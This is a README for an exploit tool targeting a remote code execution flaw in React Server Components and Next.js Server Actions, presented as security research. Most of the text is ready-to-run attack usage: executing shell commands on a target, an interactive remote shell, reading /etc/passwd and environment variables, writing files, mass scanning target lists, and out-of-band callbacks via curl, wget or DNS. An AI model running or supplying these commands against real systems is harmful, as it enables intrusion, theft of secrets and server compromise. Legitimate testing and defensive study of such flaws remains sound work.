CVE-2025-55182 - React Server Components RCE Exploit v2.0
A comprehensive security research tool for testing CVE-2025-55182 and CVE-2025-66478 vulnerabilities in React Server Components (RSC) and Next.js Server Actions.
Vulnerability Overview
| Property | Value |
|---|
| CVE IDs | CVE-2025-55182, CVE-2025-66478 |
| CVSS Score | 10.0 (CRITICAL) |
| Affected Versions | React < 19.2.0, Next.js < 15.0.5 |
| Vulnerability Type | Remote Code Execution (RCE) |
| Attack Vector | Network |
Features
- PortSwigger-style vulnerability scanning with multiple detection payloads
- Multiple RCE gadgets (execSync, spawnSync, vm.runInThisContext, etc.)
- Out-of-Band (OOB) callback testing for blind RCE verification
- File read/write capabilities
- JavaScript code execution
- Interactive shell mode
- Bulk scanning with multi-threading
- Proxy support (Burp Suite compatible)
- JSON/Text output formats
Installation
Requirements
pip install requests
Python Version
Quick Start
# Basic vulnerability check
python3 exploit-custom.py -u https://target.com --check
# Full vulnerability scan (recommended)
python3 exploit-custom.py -u https://target.com --scan
# With proxy (Burp Suite)
python3 exploit-custom.py -u https://target.com --scan -p http://127.0.0.1:8080
# OOB callback test
python3 exploit-custom.py -u https://target.com --oob your-id.oastify.com
# Command execution
python3 exploit-custom.py -u https://target.com --cmd "whoami"
# Interactive shell
python3 exploit-custom.py -u https://target.com --shell
Usage
Command Line Arguments
usage: exploit-custom.py [-h] (-u URL | -l URL_LIST) [-p PROXY] [-c COOKIES]
[-H HEADER] [-t THREADS] [--timeout TIMEOUT]
[--check] [--detect] [--scan] [--test-all]
[--oob HOST] [--cmd CMD] [--gadget GADGET]
[--read FILE] [--write FILE CONTENT] [--js JS]
[--shell] [-o OUTPUT] [-q]
Target Selection
| Argument | Description | Example |
|---|
-u, --url | Single target URL | -u https://target.com |
-l, --list | File containing URLs | -l targets.txt |
Scanning Modes
| Argument | Description |
|---|
--detect | Detect Next.js/RSC usage |
--check | Quick vulnerability check (math test) |
--scan | Full vulnerability scan (PortSwigger style) |
--test-all | Test all gadgets and detection payloads |
Exploitation
| Argument | Description | Example |
|---|
--cmd | Execute shell command | --cmd "id" |
--gadget | Specify gadget to use | --gadget execSync |
--read | Read file from target | --read /etc/passwd |
--write | Write file to target | --write /tmp/test.txt "content" |
--js | Execute JavaScript code | --js "process.env" |
--shell | Start interactive shell | --shell |
--oob | OOB callback host | --oob xyz.oastify.com |
Connection Options
| Argument | Description | Example |
|---|
-p, --proxy | HTTP/HTTPS proxy | -p http://127.0.0.1:8080 |
-c, --cookies | Cookie string | -c "session=abc123" |
-H, --header | Extra header (repeatable) | -H "X-Custom: value" |
-t, --threads | Thread count for bulk scan | -t 20 |
--timeout | Request timeout in seconds | --timeout 60 |
Output Options
| Argument | Description |
|---|
-o, --output | Save results to file (.json or .txt) |
-q, --quiet | Suppress banner |
Scanning Examples
Single Target
# Detect Next.js and RSC
python3 exploit-custom.py -u https://target.com --detect
# Quick vulnerability check
python3 exploit-custom.py -u https://target.com --check
# Full scan with all detection payloads
python3 exploit-custom.py -u https://target.com --scan
# Test all gadgets with OOB verification
python3 exploit-custom.py -u https://target.com --test-all --oob xyz.oastify.com
Bulk Scanning
# Scan multiple targets
python3 exploit-custom.py -l targets.txt --scan -o results.json
# With increased threads
python3 exploit-custom.py -l targets.txt --scan -t 20 -o results.json
# With OOB callbacks
python3 exploit-custom.py -l targets.txt --oob xyz.oastify.com -o results.json
Exploitation Examples
Command Execution
# Using default gadget (execSync)
python3 exploit-custom.py -u https://target.com --cmd "whoami"
# Using specific gadget
python3 exploit-custom.py -u https://target.com --cmd "id" --gadget spawnSync
python3 exploit-custom.py -u https://target.com --cmd "cat /etc/passwd" --gadget execFileSync
File Operations
# Read file
python3 exploit-custom.py -u https://target.com --read /etc/passwd
python3 exploit-custom.py -u https://target.com --read /proc/self/environ
# Write file
python3 exploit-custom.py -u https://target.com --write /tmp/pwned.txt "pwned"
JavaScript Execution
# Get environment variables
python3 exploit-custom.py -u https://target.com --js "JSON.stringify(process.env)"
# Get hostname
python3 exploit-custom.py -u https://target.com --js "require('os').hostname()"
# List directory
python3 exploit-custom.py -u https://target.com --js "require('fs').readdirSync('/')"
Interactive Shell
python3 exploit-custom.py -u https://target.com --shell
Shell commands:
| Command | Description |
|---|
<command> | Execute shell command |
!read <file> | Read file |
!write <file> <content> | Write file |
!js <code> | Execute JavaScript |
!gadget <name> | Switch gadget |
exit | Exit shell |
Available Gadgets
RCE Gadgets
| Name | Module ID | Description |
|---|
execSync | child_process#execSync | Direct shell command execution |
execFileSync | child_process#execFileSync | Execute binary file |
spawnSync | child_process#spawnSync | Spawn process with arguments |
vm_runInThisContext | vm#runInThisContext | Execute JS in current context |
vm_runInNewContext | vm#runInNewContext | Execute JS with sandbox escape |
vm_runInThisContext_global | vm#runInThisContext | Execute via global.process |
File Gadgets
| Name | Module ID | Description |
|---|
fs_readFileSync | fs#readFileSync | Read arbitrary files |
fs_writeFileSync | fs#writeFileSync | Write arbitrary files |
OOB Gadgets
| Name | Description |
|---|
vm_fetch | HTTP request via fetch API (Node 18+) |
vm_http | HTTP request via http module |
Detection Payloads (CVE-2025-66478)
The --scan mode uses these PortSwigger-style detection payloads:
| Payload | Description |
|---|
property_reference | Colon-delimited property reference ["$1:a:a"] |
property_reference_v2 | Alternative reference ["$1:b:b"] |
property_reference_constructor | Constructor access via property reference |
property_reference_proto | Proto chain access via property reference |
action_ref_vm | ACTION_REF with vm#runInThisContext |
action_ref_execSync | ACTION_REF with child_process#execSync |
OOB Callback Methods
The tool supports multiple OOB callback methods:
| Method | Description |
|---|
curl | HTTP request via curl command |
wget | HTTP request via wget command |
nslookup | DNS query |
ping | ICMP ping |
fetch | Node.js fetch API |
http | Node.js http module |
Output Interpretation
Terminal Colors